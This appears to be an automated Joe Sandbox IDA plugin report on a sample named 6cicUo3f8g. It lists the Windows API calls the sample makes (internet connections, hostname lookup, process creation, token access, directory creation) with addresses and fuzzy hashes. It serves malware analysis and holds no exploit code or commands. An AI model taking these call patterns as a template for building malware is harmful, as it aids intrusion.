                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 521402451-0
                                                                                                                • Opcode ID: 7b21569dc48833cbe59b4c3d8db0e9328eb85c1e339224387c3309c56105c0a6
                                                                                                                • Instruction ID: 03d0b6e358a4314acebf91581ab3263a4cbce4e2cbfe4b2b0a1a0a7acf507196
                                                                                                                • Opcode Fuzzy Hash: 7b21569dc48833cbe59b4c3d8db0e9328eb85c1e339224387c3309c56105c0a6
                                                                                                                • Instruction Fuzzy Hash: F9112771A046446FD704B2B9AC46ABE776CEFC6320F100425F218961D2EE60484297A2
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009517A3
                                                                                                                  • Part of subcall function 0095182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095184C
                                                                                                                  • Part of subcall function 0095182D: InternetCloseHandle.WININET(00000000), ref: 009518E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1463438336-0
                                                                                                                • Opcode ID: af043b0582f5633d4de9d3aaf7b9faa30e41491373242b639e9b41d055f3e64a
                                                                                                                • Instruction ID: 12a69fdbe3fb354b9657cc0184049dbc9cffd7c628ba9a70a92f05b92b7d6203
                                                                                                                • Opcode Fuzzy Hash: af043b0582f5633d4de9d3aaf7b9faa30e41491373242b639e9b41d055f3e64a
                                                                                                                • Instruction Fuzzy Hash: 3721D135204601BFEB26DF61DC00FBABBADFF88712F10442EFE1196650DB719818A7A0
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?,0096FAC0), ref: 00943A64
                                                                                                                • GetLastError.KERNEL32 ref: 00943A73
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00943A82
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0096FAC0), ref: 00943ADF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2267087916-0
                                                                                                                • Opcode ID: 82acdba0d0f077008c24aef9d3865f2859c09abd90f7f28dbe4d16a70755adc3
                                                                                                                • Instruction ID: 19bd17dd22f4fb2b8351e0f3460247bce4a30d63eafa848b49d96978c109bd6c
                                                                                                                • Opcode Fuzzy Hash: 82acdba0d0f077008c24aef9d3865f2859c09abd90f7f28dbe4d16a70755adc3
                                                                                                                • Instruction Fuzzy Hash: 2E2183745482019F8710EF39D891CAA7BE8FF56368F108A2DF4A9C72A1D731DE45CB42
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0093F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0093DCD3,?,?,?,0093EAC6,00000000,000000EF,00000119,?,?), ref: 0093F0CB
                                                                                                                  • Part of subcall function 0093F0BC: lstrcpyW.KERNEL32(00000000,?,?,0093DCD3,?,?,?,0093EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0093F0F1
                                                                                                                  • Part of subcall function 0093F0BC: lstrcmpiW.KERNEL32(00000000,?,0093DCD3,?,?,?,0093EAC6,00000000,000000EF,00000119,?,?), ref: 0093F122
                                                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0093EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0093DCEC
                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,0093EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0093DD12
                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0093EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0093DD46
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                • String ID: cdecl
                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                • Opcode ID: ec1a6f426467f9c03d0f3dee57f020ac9b259504327ee278e6f29ae8f1f47c9d
                                                                                                                • Instruction ID: 7284653cb6f2d2f852775310e0c509fdd09efde5b686c5a82f00b3b1b3057197
                                                                                                                • Opcode Fuzzy Hash: ec1a6f426467f9c03d0f3dee57f020ac9b259504327ee278e6f29ae8f1f47c9d
                                                                                                                • Instruction Fuzzy Hash: 41118136205305EFCB259F74E855E7A77A9FF85350F40402AE816CB2A0EB71DC51DB91
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00915101
                                                                                                                  • Part of subcall function 0090571C: __FF_MSGBANNER.LIBCMT ref: 00905733
                                                                                                                  • Part of subcall function 0090571C: __NMSG_WRITE.LIBCMT ref: 0090573A
                                                                                                                  • Part of subcall function 0090571C: RtlAllocateHeap.NTDLL(01440000,00000000,00000001,00000000,?,?,?,00900DD3,?), ref: 0090575F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 614378929-0
                                                                                                                • Opcode ID: b32189fef9ecce84c31acead2c48f9b57bb3369e0bb051b620323cb033aadcb0
                                                                                                                • Instruction ID: 9e2fdcf6d78c8c650aa2b4162e5131c457799e49ee6c52d5c075cb929eff12dd
                                                                                                                • Opcode Fuzzy Hash: b32189fef9ecce84c31acead2c48f9b57bb3369e0bb051b620323cb033aadcb0
                                                                                                                • Instruction Fuzzy Hash: 8711E77271CA19FFCB222F74BC45B9E379CAFD53A1B13492AF94496290DE34C8809690
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947896,?,?,00000000), ref: 008E5A2C
                                                                                                                  • Part of subcall function 008E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947896,?,?,00000000,?,?), ref: 008E5A50
                                                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 00956399
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009563A4
                                                                                                                • _memmove.LIBCMT ref: 009563D1
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 009563DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 1504782959-0
                                                                                                                • Opcode ID: 452975b7a1a0dea0eaa914de921f28e8b232c43b795fad567e45c73c09e4c401
                                                                                                                • Instruction ID: 84a217ad57fd30bdd19fa53d1755de86a15acef9ce8307a35c2b5bdfbd7aa1a7
                                                                                                                • Opcode Fuzzy Hash: 452975b7a1a0dea0eaa914de921f28e8b232c43b795fad567e45c73c09e4c401
                                                                                                                • Instruction Fuzzy Hash: A3116A32500109AFCB00FBA9E956DEEB7B8FF49314B404075F906E7162DB30AE04DB62
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00938B61
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00938B73
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00938B89
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00938BA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 36c6148280e80efacf2706a1658d5426f5415a947fd116f9812f78e20b0cc02f
                                                                                                                • Instruction ID: 4271a0a4816360f3be68817717a5d0c103eb445324e9ee332a2b985cdd9bde6a
                                                                                                                • Opcode Fuzzy Hash: 36c6148280e80efacf2706a1658d5426f5415a947fd116f9812f78e20b0cc02f
                                                                                                                • Instruction Fuzzy Hash: D2110A79901219BFDB11DB95C885FAEFBB8EB48710F2040A5E900B7250DA716E11DB94
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 008E12D8
                                                                                                                • GetClientRect.USER32(?,?), ref: 0091B5FB
                                                                                                                • GetCursorPos.USER32(?), ref: 0091B605
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0091B610
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4127811313-0
                                                                                                                • Opcode ID: 3649d427190842fad5f73aa572d5647768fb26e2939e9fd7949e12e459f63934
                                                                                                                • Instruction ID: 16d90c77d08caf687fd147a823edadaf262e8493b42f3865c15a9f7609c92e14
                                                                                                                • Opcode Fuzzy Hash: 3649d427190842fad5f73aa572d5647768fb26e2939e9fd7949e12e459f63934
                                                                                                                • Instruction Fuzzy Hash: 5F111335A10159BFCF10EFA9D8899BE77B8FB06300F40045AFA12E7250C770AA519BA6
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0093FCED,?,00940D40,?,00008000), ref: 0094115F
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0093FCED,?,00940D40,?,00008000), ref: 00941184
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0093FCED,?,00940D40,?,00008000), ref: 0094118E
                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0093FCED,?,00940D40,?,00008000), ref: 009411C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2875609808-0
                                                                                                                • Opcode ID: 4eca202532c0c3a2030ddc3b208f3aaa7dd67c2143cedbe6395873a2f9822fb8
                                                                                                                • Instruction ID: 3fe20ccc069d595b273b66a19dc64da818982da73b1b02a9b8074cf52b96a4b4
                                                                                                                • Opcode Fuzzy Hash: 4eca202532c0c3a2030ddc3b208f3aaa7dd67c2143cedbe6395873a2f9822fb8
                                                                                                                • Instruction Fuzzy Hash: A3113C31D0851DDBCF009FA5E898BEEBB78FF0E751F01445AEA45B2240DB709590DB95
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0093D84D
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0093D864
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0093D879
                                                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0093D897
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352324309-0
                                                                                                                • Opcode ID: e666e2747c9966e7d10b72e33f598d5d33714a629be357aa02e196cd50b7d8b6
                                                                                                                • Instruction ID: da1e42c019082e8ddfead541fefc20d3c81dc16038e0bc4376c40855aa4f7911
                                                                                                                • Opcode Fuzzy Hash: e666e2747c9966e7d10b72e33f598d5d33714a629be357aa02e196cd50b7d8b6
                                                                                                                • Instruction Fuzzy Hash: 44113C75A0A304DBE3208F51FC58F92BBACEB00B00F10896DA516D7450D7B4F949AFA1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction ID: 67093834b3d287d3b4871e679bde19617b4b88a02104a491044d2e4c79cda2e0
                                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction Fuzzy Hash: AE01693264824EBBCF125EC4CC018EE7F76BB1C390B488415FA1858030D236CAB1AB91
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0096B2E4
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0096B2FC
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0096B320
                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096B33B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 357397906-0
                                                                                                                • Opcode ID: bb4beb7836909f1484fa0e6842976f795616ba0ebda7d69d212f8e9e72684ec1
                                                                                                                • Instruction ID: ff743c3e07d6aabdb6b20eea9f36d6055161e32889302b0fa561b2a07f21bcbb
                                                                                                                • Opcode Fuzzy Hash: bb4beb7836909f1484fa0e6842976f795616ba0ebda7d69d212f8e9e72684ec1
                                                                                                                • Instruction Fuzzy Hash: F61143B9D1420DEFDB41CFA9D8849EEBBB9FB08310F108166E914E3220D775AA659F50
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0096B644
                                                                                                                • _memset.LIBCMT ref: 0096B653
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009A6F20,009A6F64), ref: 0096B682
                                                                                                                • CloseHandle.KERNEL32 ref: 0096B694
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3277943733-0
                                                                                                                • Opcode ID: fce20891861f5176f2f65a158f8196675e2ccb5c91799660a5d921667cf52047
                                                                                                                • Instruction ID: 0a3e5d350d29e07e5f7593619ec039e700ab3a04f4ba4571cd0dd163ef39a506
                                                                                                                • Opcode Fuzzy Hash: fce20891861f5176f2f65a158f8196675e2ccb5c91799660a5d921667cf52047
                                                                                                                • Instruction Fuzzy Hash: 24F05EB2554300BEE7102761BC0AFBB3A9CEB0A395F044020FA08E91D2E7B14C0097E8
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00946BE6
                                                                                                                  • Part of subcall function 009476C4: _memset.LIBCMT ref: 009476F9
                                                                                                                • _memmove.LIBCMT ref: 00946C09
                                                                                                                • _memset.LIBCMT ref: 00946C16
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00946C26
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 48991266-0
                                                                                                                • Opcode ID: f114ce60dc2005ed21560b4c29b73b3d938a2df4aaeed98d8350743bfaed8a08
                                                                                                                • Instruction ID: 7a384d9c10fcb460f7802e09d10abcb2205c840196edb1aa61a6f38c9c6012c9
                                                                                                                • Opcode Fuzzy Hash: f114ce60dc2005ed21560b4c29b73b3d938a2df4aaeed98d8350743bfaed8a08
                                                                                                                • Instruction Fuzzy Hash: BFF05E3A204100AFCF016F95EC95F8ABB2AEF85320F048065FE086E267C771E811DBB4
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 008E2231
                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 008E223B
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 008E2250
                                                                                                                • GetStockObject.GDI32(00000005), ref: 008E2258
                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 0091BE83
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0091BE90
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0091BEA9
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0091BEC2
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0091BEE2
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0091BEED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1946975507-0
                                                                                                                • Opcode ID: b581a31f110d580facbd93b97e89228363ede990d5299a4119cff6d6f9f7d317
                                                                                                                • Instruction ID: 3bc29e7119081b640cbf65d566abf34f76bc2a0cb534d01ee584dcbaf642b22d
                                                                                                                • Opcode Fuzzy Hash: b581a31f110d580facbd93b97e89228363ede990d5299a4119cff6d6f9f7d317
                                                                                                                • Instruction Fuzzy Hash: 80E06D3261C244EBDF215F64FC1D7E83F15EB06336F00836AFA69880E187B14980EB12
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0093871B
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,009382E6), ref: 00938722
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009382E6), ref: 0093872F
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,009382E6), ref: 00938736
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
